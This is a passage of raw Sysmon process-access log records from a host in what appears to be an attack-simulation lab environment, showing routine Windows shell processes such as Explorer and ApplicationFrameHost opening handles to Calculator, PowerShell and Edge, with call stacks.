32\ntdll.dll+6ced1
10341000x8000000000000000360366Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360365Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360364Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-337e-6013-9502-000000001100}7612C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360363Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-337c-6013-8e02-000000001100}1960C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360362Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3380-6013-9a02-000000001100}7332C:\Windows\System32\MicrosoftEdgeCP.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360361Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-337d-6013-9102-000000001100}7292C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360360Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-339a-6013-c202-000000001100}10132C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360359Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3381-6013-9d02-000000001100}8712C:\Windows\SystemApps\InputApp_cw5n1h2txyewy\WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360358Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360357Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360356Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+320f9|C:\Windows\system32\twinui.pcshell.dll+31966|C:\Windows\system32\twinui.pcshell.dll+14b85|C:\Windows\system32\twinui.pcshell.dll+11de6|C:\Windows\system32\twinui.pcshell.dll+1a72c|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360355Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16565180C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\TaskFlowDataEngine.dll+cded0|C:\Windows\System32\TaskFlowDataEngine.dll+971db|C:\Windows\System32\TaskFlowDataEngine.dll+96e76|C:\Windows\System32\TaskFlowDataEngine.dll+93c96|C:\Windows\System32\TaskFlowDataEngine.dll+925b8|C:\Windows\System32\TaskFlowDataEngine.dll+9cf11|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360354Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337e-6013-9402-000000001100}75849212C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360353Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.780{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360352Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.780{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e
10341000x8000000000000000360351Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.780{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360350Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.780{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+3b14c|C:\Windows\system32\twinui.pcshell.dll+3afee|C:\Windows\system32\twinui.pcshell.dll+3ba1c|C:\Windows\system32\twinui.pcshell.dll+135ae|C:\Windows\system32\twinui.pcshell.dll+131c0|C:\Windows\system32\twinui.pcshell.dll+27787|C:\Windows\system32\twinui.pcshell.dll+ec44|C:\Windows\system32\twinui.pcshell.dll+e30d|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2
10341000x8000000000000000360349Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.765{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360348Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.765{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360347Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.765{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360346Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.765{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360345Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360344Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360343Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+3b14c|C:\Windows\system32\twinui.pcshell.dll+3afee|C:\Windows\system32\twinui.pcshell.dll+3ba1c|C:\Windows\system32\twinui.pcshell.dll+135ae|C:\Windows\system32\twinui.pcshell.dll+131c0|C:\Windows\system32\twinui.pcshell.dll+20cec|C:\Windows\system32\twinui.pcshell.dll+1003d|C:\Windows\system32\twinui.pcshell.dll+c179b|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2
10341000x8000000000000000360342Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\system32\twinui.pcshell.dll+22359|C:\Windows\system32\twinui.pcshell.dll+20684|C:\Windows\system32\twinui.pcshell.dll+ff1f|C:\Windows\system32\twinui.pcshell.dll+c179b|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+